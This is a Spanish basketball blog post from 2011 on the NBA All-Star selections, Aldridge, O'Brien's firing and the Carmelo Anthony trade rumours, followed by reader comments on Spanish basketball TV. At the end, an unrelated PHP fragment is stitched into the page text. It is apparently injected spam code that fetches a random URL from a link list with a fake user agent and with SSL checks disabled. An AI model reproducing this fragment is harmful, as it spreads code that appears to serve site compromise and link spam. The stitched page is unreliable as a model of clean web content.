Reflexiones sobre la bocina #1

10 de February de 2011 por MagicJohnson32

Por lo visto no tenemos suficiente con las crónicas diarias, los análisis, la revisión de los pronósticos, los artículos sobre NCAA y demás. No, lo cierto es que nunca tenemos suficiente. Así que estrenamos sección, algo que hemos bautizado como “Reflexiones sobre la bocina”. Aquí encontraréis, básicamente, una mirada a algunos hechos más o menos noticiosos y de actualidad, realizada bajo el prisma del que suscribe. Es decir, opinión, con un puntito (o dos, dependiendo de si ese día han ganado o no los Lakers) de mala leche. Entended esta nueva sección como una invitación a la participación y a la reflexión. Se aceptan de buen grado las críticas (aunque se prefieren los elogios) y, por qué no, sugerencias.

Allá vamos.

Uno de los momentos más acalorados de los All Stars en la última década.

3… All Star

Recientemente supimos qué jugadores participarán en el All Star Game de Los Angeles 2011. Lo reconozco, el All Star me importa un comino. Antes prefiero ver un Nets-Cavs, o incluso una película española con guión de Sinde. Bueno, retiro lo segundo, para salvaguarda de mi ya de por sí escasa credibilidad. Pero lo del Nets-Cavs lo digo en serio, que siempre cabe la posibilidad de que seamos testigos de algo tan excepcional como ver a Brook Lopez atrapar más de 8 rebotes en un partido. (nota: a 10 de febrero, Lopez lleva 34 partidos consecutivos sin sumar dobles figuras en rebotes)

A lo que me refiero es a que ya no le encuentro la gracia, el encanto, la magia o lo que sea que se le supone al fin de semana de las estrellas. Es más: me molesta. Uno, fanático de esto hasta la médula, lo que quiere es competición, y no esos simulacros de “Solteros VS Casados” en que se han convertido los All Star Games, por no hablar del infame rookies vs sophomores o de un concurso de mates al que deberían cambiar el nombre por “A ver si a la vigésimo séptima, Nate Robinson es capaz de meterla”.

No siempre ha sido así. Hubo un tiempo, ya bastante lejano, en el que esperaba con ilusión la llegada de esta cita anual. Esa madrugada de domingo a lunes hacia finales de febrero era sagrada.  Además, en la era pre-Gasol, era una de las escasas ocasiones en la que se trataba la NBA en los medios de comunicación españoles. Pero entre unos y otros se han encargado de llevar el All Star a un proceso de degradación que ha llegado al punto de que apenas me interesa saber el resultado al día siguiente.

lamarcus yao

"Yao superando a LaMarcus" o "el baloncesto según mil millones de chinos".

Y si encima resulta que se anuncian los equipos del All Star y no están ni Kevin Love ni LaMarcus Aldridge, dos de los mejores interiores de la temporada, mientras los chinos continúan votando a Yao como si quisieran evitar su expulsión de la academia de OT…

Lo dicho, yo paso.

2… Hablando de LaMarcus

Ya ha aparecido el tema un par de veces en nuestras crónicas, pero el chico merece que insistamos: ¡qué temporada está haciendo Aldridge! Y qué mérito el suyo, sosteniendo en puestos de Playoffs en el Oeste a un equipo reventado por las lesiones. Sin Roy, sin Oden, sin Camby, sin ni siquiera Pryzbilla, y con Andre Miller peleado con todo y todos, Aldridge ha superado su status de ‘segunda espada’ y se ha revelado como uno de los jugadores más determinantes de la liga. Sólo así se explica la posición en la que se encuentran los Blazers a estas alturas. Aldridge es el flotador al que han de abrazarse los fans de la franquicia de Oregon, tan necesitados de buenas noticias.

1… Bye bye O’Brien!

A veces cuesta entender qué pasa por la cabeza de ciertos entrenadores y de los directivos que los mantienen en sus puestos. Afortunadamente, para los Pacers no parece que la reacción haya llegado demasiado tarde. El despido de O’Brien le ha sentado de maravilla a un equipo que se encontraba en un proceso depresivo cada vez más acelerado. Poco quedaba ya de aquellos Pacers de los primeros meses de competición, asentados en Playoffs, capaces de ganar en la misma semana a Heat y Lakers a domicilio, y que tenían a Roy Hibbert entre los principales candidatos al MIP.

Obbie

El sentimiento es mutuo.

En lugar de premiar el trabajo bien hecho y reforzar la confianza de proyectos tan prometedores como Collison, Hansbrough, Rush, Paul George o el propio Hibbert, O’Brien se dedicó a machacar la moral de los jóvenes en beneficio muchas veces de jugadores intrascendentes y más cercanos al retiro que a sus mejores años. Recuerdo pocas decisiones tácticas tan inexplicables como la que le costó a los Pacers el partido en el Madison, cuando O’Brien colocó a Posey para defender a Amare Stoudemire en los últimos minutos. Pero O’Brien es historia y los Pacers vuelven a ilusionar. Ahora es cuestión de ver cuánto tiempo  más tendremos que soportar a Avery.

"Mira la estadística de rebotes de Brook Lopez ¡Me parto!"

0… Aprende, Prokhorov.

Mikhail Prokhorov y Donnie Walsh han recibido esta semana una lección de economía básica, cortesía de los Nuggets: la ley que rige cualquier negociación, oferta, demanda y todo eso. Los de Colorado han reavivado el valor de Carmelo Anthony con el rumor de que habían iniciado las negociaciones con los Lakers para un traspaso en el que entraría Andrew Bynum. Estoy convencido de que a los pocos minutos de conocerse el rumor, los teléfonos de las oficinas de los Nuggets estaban recibiendo llamadas desde Newark y Nueva York. Bien jugado.

Comenta

31 comentarios a esta entrada

  1. M dice:
    #1

    Divertidísimo. Se seguirá con la misma fruición y gusto que el resto de secciones de la página. No sé por qué, tengo mucha confianza en el jugador que puede llegar a ser Tyler Hansbrough, ¿es grave, doctor? 🙂

      Citar

  2. MagicJohnson32 dice:
    #2

    Tómese usted una pastilla de los Laboratorios O’Brien cada 12 horas, y verá qué rápido se le pasa.

      Citar

  3. Hynreck dice:
    #3

    Jo, lo de Brook es que es acojonante, sólo lleva un doble-doble en lo que va de temporada.
    En rebotes por 48 min está el 213 de la liga, y el séptimo peor reboteador entre los pivots ( 80º, 7.9 por 48 min)

    Iba a decir que es cosa de familia, ya que Robin sólo anda 10 puestos más arriba (70 entre los 85 pívots en total), pero creo que debe ser un mal endémico de la universidad de Stanford. Porque los tambien gemelos Collins ocupan los puestos 79 y 83 respectivamente.

    66 Jermaine O’Neal , BOS 10.0
    67 Brad Miller , HOU 10.0
    68 * Semih Erden , BOS 9.9
    69 Hasheem Thabeet , MEM 9.6
    70 Robin Lopez , PHX 9.6
    71 Channing Frye , PHX 9.4
    72 Theo Ratliff , LAL 9.4
    73 Alexis Ajinca , TOR-DAL 9.0
    74 Francisco Elson , UTA 8.6
    75 Mehmet Okur , UTA 8.5
    76 Glen Davis , BOS 8.5
    77 Joel Anthony , MIA 8.3
    78 Ryan Hollins , CLE 8.2
    79 Jason Collins , ATL 8.2
    80 Brook Lopez , NJN 7.9
    81 Fabricio Oberto , POR 7.5
    82 Andrea Bargnani , TOR 7.4
    83 Jarron Collins , LAC 5.2
    84 Brian Scalabrine , CHI 4.8
    85 * Hamady N’Diaye , WAS .0
    85 * Hassan Whiteside , SAC .0

    Me encantan estas estadísticas!!!

      Citar

  4. Denise dice:
    #4

    A mi tambien me molesta el All-Star y ya no soy capaz de verlo ni en diferido tranquilamente al dia siguiente por la mañana. Lo unico a lo que pueda que le eche una ojeada es al concurso de triples, lo mas objetivo, emocionante y divertido para mi del all-star

      Citar

  5. HisRoyalAirness dice:
    #5

    Me gusta esto de que la página tenga más actividad! Enhorabuena a todos y en especial a MagicJohnson32 por la iniciativa!

    Por cierto, teneis twitter? Con la calidad de la página os extenderiais como la espuma…

      Citar

  6. HisRoyalAirness dice:
    #6

    Y añado, desde hace años el All-Star es una mierda. Molaba antes cuando había rivalidad por ser la mejor conferencia y era realmente competitivo.
    Tenía que dar unas charlas de motivación el Zen Master para que volviera el espíritu de los 80 al partido de las estrellas.
    El año pasado fue el colmo de la payasada, nunca había visto un correcalles semejante

      Citar

  7. xapa_croack dice:
    #7

    Despues del robo de rudy como quieres que miremos el all star, todo para ellos, nosotros nos quedamos con la copa del rey que mola más y tb es en un finde.

      Citar

  8. Txusma dice:
    #8

    No tenemos twitter pero se pueden compartir los artículos a través suyo mediante un enlace que hay en cada uno de ellos. Si alguien quiere hacer de portavoz… Nosotros no damos para más. 😀

      Citar

  9. TheDeerHunter dice:
    #9

    Habéis tocado un tema que incluye una de mis grandes decepciones.
    Yo creía en O’Brien. Un tipo con bastante buen gusto ofensivo.
    No sé cuándo empezó a perder la fe en si mismo y la cabeza. Lo de esta temporada no tiene nombre.

    Del all-star. Tenéis bastante de razón y parece que cada día da más pereza verlo… pero también creo que aquí en europa estamos algo obsesionados con la competitividad y en cierto modo nos perjudica. El gusto por el show es lo que les da a los americanos esa ventaja/base económica que a nosotros a un nos cuesta encontrar para grandísimos productos deportivos que se pueden ofrecer aquí y apenas obtienen rendimiento. De hecho este país es algo único en Europa y apenas el fútbol es mínimamente rentable (si lo es)

      Citar

  10. kantonyo dice:
    #10

    Muy grande Magic, un articulo superfresco y ameno.

    Lo del Allstar ya hemos dicho por aqui que se deberian jugar aunque fuera el factor campo en la final de la NBA. Yo creo que eso haría tomarselo más en serio sobre todo a los entrenadores.

    En cuanto a Portland, siempre he dicho que McMillan es un gran entrenador de equipos pequeños, pero un mediocre entrenador de equipos grandes. Con él, los Blazes, será dificil que caigan a puestos bajos, pero jamas daran el salto de calidad para ser aspirantes a un titulo.

      Citar

  11. Denise dice:
    #11

    Si alguien apostara por el baloncesto en España, sería minimamente rentable, no digo que llegara al 15 % de share, pero al menos podría manejarse en torno al 6-7% que ya es una buena cifra para como está hoy la TV con tantas cadenas (mierdas el 95% de ellas)… pero…como quieres que la ACB y la Euroliga tengan exitos de audiencia si lo emiten por Teledeporte y sin promoción.
    Mira el caso de la Formula 1, es cierto que apoyado por los triunfos de Frenando (jaja) Alonso, pero la cadena basura apostó por ella cuando TVE que era quien poseia los derechos, y la tenía marginada, y la cadena basura la promocionó hasta la pesadez y tras 5 años y el cambio de cadena que la retransmite, la Formula 1 llega al 40% de share (la carrera) y los larguisimos y pesados pre-carrera y post-carrera te hacen facilmente un 15%, demasiado teniendo en cuenta lo aburrido de este deporte en el que ves dos adelantamientos en una hora.
    El motociclismo tambien es rentable, de hecho creo que la cadena basura ha comprado sus derechos para el proximo año.

      Citar

  12. TheDeerHunter dice:
    #12

    En realidad no quiero entrar en temas de promoción y retransmisión, o cómo gestiona sus derechos el baloncesto español/europeo o cómo se retransmite. Me parece que algunas cosas no se hacen tan mal como las audiencias indican. Y, en general, la gente pasa demasiado del baloncesto.

    Yo me quedo con algunos factores que a mí no me convencen. Partidos muermísimos en los que ninguno de los dos equipos supera demasiado los 50 puntos (y porque tras muchísimos años de pelearlo decidieron bajar a 24 segundos, que si no aún estaríamos así), canchas cutrísimas no especialmente superiores al pabellón del pueblo (y que por la TV dan auténtica pena), iluminación, comodidad… shows altamente mejorables en los descansos ¿animadoras???

    A mí me da que la calidad de los equipos no se corresponde con la imagen que transmiten sobre todo al exterior… de todas formas no soy un experto en el baloncesto de aquí, aviso antes de que os tiréis a mi degüello.

      Citar

  13. Sancho88 dice:
    #13

    Por lo menos ya no aparece Romay diciendo gilipoyeces como: “se rasca los tobillos” o “vaya partidazo se está marcando nosequien (igual por meter un triple y coger un par de rebotes ya decia eso)”. Ahora está el loqueras del Sheriff Comas, que dice que el Pamesa va a llegar a la final de la ACB y que Terence Morris es cojonudo. Y el Arsenio tambien presumiendo de que él fue árbitro de no se que y diciendo.: “África, habla con tal jugador…”, y un segundo después… “Pues no, no tenemos conexión con África”. Y la chavala está ahí a 20 metros a pie de pista…

    En fin, por todas estas cosas y las charlas aburridas que hacen normal que vaya como una puta mierda la audiencia. Es que son escandalosamente malos. Si lo piyara la sexta seguro que daban mucha mas bola a la liga. Pero mientras… es lo que hay. También es cierto que el deporte en España es una verguenza. Ayuntamientos construyendoles estadios de lujo a los equipos de futbol para que puedan pagarse las deudas vendiendo los terrenos donde tenían el anterior y todas esas mamonadas. Pero por ejemplo, el Pucela esta en ley concursal, Granada anda jodida de cojones, Manresa ídem… Estudiantes más de lo mismo…. y no les va a salvar nadie a esos clubes. Una pena.

      Citar

  14. HeiNeKeN dice:
    #14

    Este blog siempre innovando, me gusta 😉

    Respecto al All Star, desde aquel en el que el Este remonto 21 puntos en el ultimo cuarto de la mano de Marbury (Nets), Iverson (76ers) y Allen (Bucks), la intensidad del mismo a bajado muchisimo. Antes eran “duelos a muerte” por ver que conferencia era mejor (tipicamente Americano esto, Costa Este contra Costa Oeste de toda la vida).

      Citar

  15. Hynreck dice:
    #15

    Sancho, nunca entenderé por qué un Ayuntamiento que es un ente público tiene que construir un pabellón para un club privado. Que los clubes se autofinancien, tanto generan, tanto gastan. Las ayudas públicas son una vergüenza. Y ya no digo nada de los pabellones y campos municipales que no se utilizan (Veáse la aberración del estadio olímpico de La Cartuja en Sevilla).
    En Burgos el año pasado si subía el Autocid a la ACB, se hubiese tenido que ir a jugar a Valladolid porque el pabellón no valdría. La gente se echaba las manos a la cabeza y exigía al ayuntamiento el construir un nuevo pabellón. Me encantaría por fín ver al Autocid en ACB, pero si me cobran una entrada por ir a verles, por qué leches les tengo yo que pagar el pabellón?
    Yo debería tener el mismo derecho a usar esas instalaciones que el equipo al que se le dan a coste cero.

      Citar

  16. Sancho88 dice:
    #16

    Sí, pero que lo que digo, que ya que se gastan la pasta, que dejen también para el resto de deportes, no sólo a fútbol. Y sí tio, yo tengo un colega de Burgos y seguí muy de cerca los Playoffs del año pasado. Una pena la lesión de Chris Hernández en los últimos partidos, porque con ese tío, Lorant que es un maquinón, y Anagonye bregando dentro… joder, yo creo que Burgos podría por lo menos haber ganado esa final, luego ya se habría visto si había pabellón o no. Con tíos como Albano o Castro defendiendo… Le echaron muchos huevos, la verdad. menos Corrales, que como siempre abriendo la bocaza y aportando muy poquito, solo sabia tirarse piedras y perdiendo balones ridículos. en fin, a ver si este año puede ser. Y tio, seria una pena que por el pabellón no pudieran subir. Joder, Mendez Pozo o alguno de estos, que en Burgos hay pasta, que metan algo tio, que merece la pena un proyecto tan ilusionante.

      Citar

  17. HisRoyalAirness dice:
    #17

    Creo que el problema del baloncesto ACB (y de muchos sectores de entretenimiento español, como el cine) es que se quiere conseguir todo con la fórmula del lloriqueo; esta fórmula funciona con una queja y la correspondiente justificación de llorica a modo “es culpa de otros”, me explico:
    -La gente no ve el baloncesto español–> eso es porque la gente no entiende de basket y prefiere ver a tíos que se dopan saltando en vez de baloncesto de verdad.
    -Los clubes no pueden competir contra el futbol–> eso es porque el gobierno no da ayudas al baloncesto y hay una conspiración judeo-masónica para que a la gente le guste más el futbol.
    -Las televisiones no se interesan por los derechos del baloncesto!–> las televisiones son estúpidas y no tienen idea de marketing, es todo un complot porque cualquiera sabe que si el baloncesto se televisase en Telecirco sería un exitazo de audiencia.

    Toda esta mierda de excusas de gente tipo Romay etc son las que pretenden ocultar los problemas de base: que los yankis nos llevan siglos de ventaja a la hora de vender productos de entretenimiento, que el problema no es de el ciudadano de a pie que no se interesa por el baloncesto sino de que el envoltorio no es nada atractivo; si a alguien le pones en una mesa una mierda de perro y al lado una mierda de perro envuelta en papel brillante con un lazo de colores y luces de navidad a la segunda le hará caso.

      Citar

  18. Jabho dice:
    #18

    Comparto que el baloncesto en España está mal “vendido” pero además creo que como juego es mucho más aburrido que el de NBA. En Europa se nos llena la boca con los conceptos, los sistemas, bla, bla, bla…y te tragas partidos que acaban 55-60.

    Yo lo primero que haría sería modificar las normas para que el juego ofensivo no tenga la desvantaja que tiene actualmente contra la defensa. Lo primero sería meter los 3 segundos defensivos y lo segundo permitir dar dos pasos antes de botar….

    Sobre el tema O´brien no es un mal entrenador pero algo que me dice que no había buena quimica….raro como ha ido la temporada.

    A mi el All Start me interesa entre poco y nada desde hace años. Es aburrido a más no poder. Por cierto, para mi gusto Love no tenía que haber ido… ¿como se puede hacer esos números y tener tan mal record?¿sus números corresponden a su influencia en el juego? Para mi se lo merecía mas Lamarcus

      Citar

  19. Denise dice:
    #19

    Yo estoy con el ultimo parrafo de Royal, si tu promocionas bien algo, la gente se lo traga, la Sexta lo está haciendo bien con la selección, vale que la Roja tenga mas tiron que la ACB, pero por ejemplo, los partido de la roja de basket de preparación tienen mas audiencia que cualquier partido ACB que no sea el Madrid-Barcelona.
    A los españoles les gusta el baloncesto y saben sus reglas, pero le aburre verlo por TV, algo de culpa tendrá quien lo emite, personalmente conozco mucha gente (sobre todo mujeres) que le flipan ver el basket en vivo y van a la cancha siempre que su equipo juega de local, y despues si lo echan por la tele de visitante no lo ven…
    No estoy de acuerdo con deer cuando dice lo de los 50y tantos puntos del basket europeo, es cierto que muchos partidos se manejan en esas cifras, pero las medias de anotación de la NBA tampoco es que sean mucho mejores teniendo en cuenta que se juegan 8 minutos más y a un ritmo mayor.

      Citar

  20. Denise dice:
    #20

    Yo tambien creo que habría que implantar los 3 seg. defensivos, y ensanchar un poco mas el campo, que ahora los tiradores siempre pisan la linea de banda cuando van a tirar un triple desde la esquina (apenas hay espacio con el triple a 6,75 m). Asi veriamos mas mates, y menos ventaja para los grandullones, que en defensa tendrían que salir de la cueva.

      Citar

  21. HisRoyalAirness dice:
    #21

    Está claro Denise, las reglas hay que adaptarlas pero yo también creo que no es sólo problema de las televisiones y las retransmisiones, es de los propios clubes y la ACB. Siempre coon la crítica a lo ajeno (lo estadounidense en este caso) de que si el consumismo, el circo mediático y tal y cual. Allí también hay franquicias con problemas de aforo y de pasta. Y cómo se soluciona? Pues como en cualquier deporte, con un jugador que atraiga al público, con entretenimiento en el propio pabellón al margen del juego (la chorradita de la kiss-cam, comida basura, buenos asientos). Es un negocio y es triste ponerse en este plan tan consumista cuando se trata de un juego pero el mundo funciona así. Y los clubes y la Federación tienen que empezar a ser conscientes de eso. Para todo esto hace falta pasta? Sí, pero no todo son inversiones sino adaptarse a los tiempos. Y si hay que americanizar el show por la propia salud de la liga pues habrá que tragar y dejarse de tradicionalismos.

      Citar

  22. Denise dice:
    #22

    Pero el problema de la ACB no es el de aforo, sino el de TV. La gente va a las canchas, y cada año se supera el record de asistentes totales, y los pabellones empiezan a quedarse pequeños y tienen que construir nuevas canchas (como decian por ahi arriba).
    Curiosamente, el Barça, el mejor equipo de Europa en estos momentos, es el peor equipo con diferencia en asistencia a la ACB, no en terminos totales, sino en relacion a la dimension de la ciudad.
    Con el equipazo que tienen, lo normal sería que jugaran en el Sant Jordi y este estuviera siempre a reventar

      Citar

  23. HisRoyalAirness dice:
    #23

    Sí, la verdad es que tienes razón en lo del aforo. Creo que el problema es la venta del producto, todo lo que huele a baloncesto en España tiene aspecto de ajado y cutre, es una sensación que tiene mucha gente. es increíble que el tirón mediático de la selección de basket sólo lo aprovechase debidamente la Federación Española y no los clubes.

      Citar

  24. MagicJohnson32 dice:
    #24

    Notición: tres días después de renovar, Jerry Sloan dimite. Por lo visto, la mala relación con Deron es una de las causas.

    http://sports.espn.go.com/nba/news/story?id=6109031

      Citar

  25. Viva_Dirk dice:
    #25

    No tenian muy buena pinta los Jazzs desde fuera, veremos que camino toman ahora sin Sloan.

      Citar

  26. M dice:
    #26

    Joderrrrr, no se puede despedir así Sloan. Hasta pronto maestro…increíble final 🙁

      Citar

  27. Busky23 dice:
    #27

    Una pena que tras casi 1/4 de siglo y más de 1000 victorias tenga que salir de esta manera.

      Citar

  28. Txusma dice:
    #28

    Perdón? El entrenador de los Jazz no es Jerry Sloan?? Imposible!

    Yo le hubiera pegado una patada a Deron…

      Citar

  29. Tweets that mention Reflexiones sobre la bocina #1 | tjnba.com -- Topsy.com dice:
    #29
  30. Titus dice:
    #30

    Me quito el sombrero ante todos los comentarios de Denise, sobretodo el del concurso de triples de la NBA como lo único reseñable, y también que con una buena promoción (mejor que la que hace Bertomeu en la Euroliga) la cuota de pantalla tiene que ser buena. El boom del Basket en los 80-90 qeu coincidió con la salida de la revista Gigantes y con la posterior reforma de la liga a ACB, enganchó a muchisima gente, y sobretodo muchísimos escolares y adolescentes, que enrolaron a sus conocidos hacia el basket. Recuerdo mis tiempos de instituto quedarnos a hacer partidos de basket y no de futbol. Ahora a los niños hablales solo de Ronaldo o Messi.
    En lo único que discrepo, aunque solo ligeramente, es que teniendo el barça el mejor equipo del continente en barcelona no se le va a ver, puedo decir que algun amigo mio, siendo culé tiene carnet de socio y abono de baloncesto, pero no lo ha tenido nunca de futbol, creo que son públicos distintos y el baloncesto tiene que volver a conquistar adeptos que ahora están viendo correr y pegar patadas.
    Saludos a todos.

      Citar

  31. Denise dice:
    #31

    jja ja pues gracias Tituc

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>